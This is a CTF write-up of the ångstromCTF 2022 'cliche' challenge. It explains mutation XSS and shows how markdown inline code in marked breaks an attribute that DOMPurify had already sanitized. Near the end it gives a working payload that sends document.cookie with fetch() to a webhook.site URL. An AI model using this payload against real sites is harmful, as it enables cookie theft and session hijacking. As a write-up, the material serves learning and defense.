Cliche Writeup — ångstromCTF 2022

Mutation XSS in DOMPurify and marked

FHantke
InfoSec Write-ups

--

Last weekend, I played the ångstromCTF 2022 with my team FAUST. During the CTF, I came across a relatively simple constructed but clever web challenge that I want to share with you. This is the writeup for cliche. If you are only here to see the solution, feel free to skip to the end of the last section.

The Challenge

The challenge text promised the least interesting web challenge, with which I must disagree. Besides the link to the challenge, an admin bot was given that has the flag in its cookies and follows a given link.

Tired and desolate, clam gave up on writing creative web. Instead, he spun the wheel of overused challenge ideas three times, and got “pastebin”, “markdown”, and “input sanitization.” Lo and behold, the least interesting web challenge in the world.

The challenge page consists of a textarea and a button.

When we open the challenge, we only see a textarea to add content and a button to view it. Clicking the button reloads the webpage with the textarea content as a URL parameter: https://clicke.web.actf.co/?content=<u>foobar</u>. Then, the webpage renders the content. However, any obvious XSS would not work, so we next take a look at the source code.

<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
...
<script>
const qs = new URLSearchParams(location.search);
if (qs.get(“content”)?.length > 0) {
document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get(“content”)));
}
</script>

The code reveals why no basic XSS works. As the challenge text already spoilers, an HTML sanitizer is used. Before the content is added to the body, the page first sanitizes it with DOMPurify (Version 2.3.6) and then parses it with the markdown library marked (Version 4.0.14). Both modules are used in the newest version.

Since I’ve been studying weird parsing behavior lately, it was clear that the challenge was finding a mutation XSS payload.

Mutation XSS

What is mutation XSS (mXSS)? The concept of mXSS is well explained in a paper by Heider et al.. It basically means that various parsers mutate an XSS payload multiple times to get from previously benign content to malicious content. To illustrate that, look at the following example:

let init = '<form id="first"><div></form><form id="second">';
document.body.innerHTML = init;
let mutated_1 = document.body.innerHTML;
document.body.innerHTML = mutated;
let mutated_2 = document.body.innerHTML;
console.log(init);
console.log(mutated_1);
console.log(mutated_2);
// Output
<form id="first"><div></form><form id="second">
<form id="first"><div><form id="second"></form></div></form>
<form id="first"><div></div></form>

We can see that the init HTML string mutates by parsing the same string multiple times by adding it to innerHTML. It's strange, isn’t it, since we would expect HTML to keep its form. However, this is the defined behavior by the HTML specification.

Nowadays, HTML sanitizers or filters often render an HTML input first before the browser renders it to avoid complex deobfuscation techniques. However, as we have seen above, the HTML content does not always keep the same and can change with multiple parsing processes. In fact, such weird HTML edge-cases led to various bypasses, for instance, in DOMPurify version 2.0.0 or version 2.0.17, or even an XSS in Google Search.

Solution

With the previous section in mind, we can see that the challenge has three contiguous parsers. First, the input is parsed by DOMPurify, then by marked, and finally by the browser via innerHTML. This stinks like mXSS.

After unsuccessfully playing around with various typically mXSS techniques, such as table, form, or style elements, I focused on the markdown part. I tried out multiple markdown elements combined with HTML content that could trigger XSS. Since DOMPurify filters all malicious parts in HTML, it was clear to me that I had to find a markdown element that breaks the HTML so that I could forge a malicious payload from content that is hidden in a benign HTML part, e.g., an attribute. This was when I found the markdown code block (`).

var inp ='`<p id="aaa`bbb">';
document.body.innerHTML = marked.parse(DOMPurify.sanitize(inp));
// Ouput
'<p><code>&lt;p id=&quot;aaa</code>bbb&quot;&gt;</p></p>\n'

As demonstrated above, the markdown inline code is prioritized over the HTML element and breaks it. The first half ends up inside a code block; the second half is outside. Exactly what I needed!

// Payload
`<p x="`<img src=x onerror=alert(1)>"></p>
// Output
<p><code>&lt;p id=&quot;</code><img src=x onerror=alert(1)>&quot;&gt;</p></p>

The payload looks good for DOMPurify since the malicious part in the id does no damage. But then, marked breaks the attribute and puts its code elements around it. As a result, the image element is outside the attribute and parsed as a standard element, triggering the alert.

The final payload that I sent to the bot looked like the following and gave me the flag:

https://cliche.web.actf.co/?content=`%3Cp%20x=%22%3Cimg%20src=x%20onerror=fetch(window.location.hash.substring(1)%2Bdocument.cookie)%3Efoo%3C/img%3E%22%20title=%22hello`%22%3E%3Cimg%20src=x%3E%3C/p%3E#https://webhook.site/1b96a1e3-307b-4f46-9f3a-e3eba4cc538d?x=// Output on webhook.site:
actf{my_code_is_upside_down_topsy_turvy_1029318}

Conclusion

This exciting challenge showed once again how easy it is to put bugs in code even when the initial intention was good. The funny thing is that marked even recommends DOMPurify as a sanitizer. However, as we can see, this only works if sanitation is the last step in the process.

Besides my solution, I am sure there must be more interesting ways to solve the challenge. I am curious to see what other solutions are possible.

https://twitter.com/fh4ntke

--

--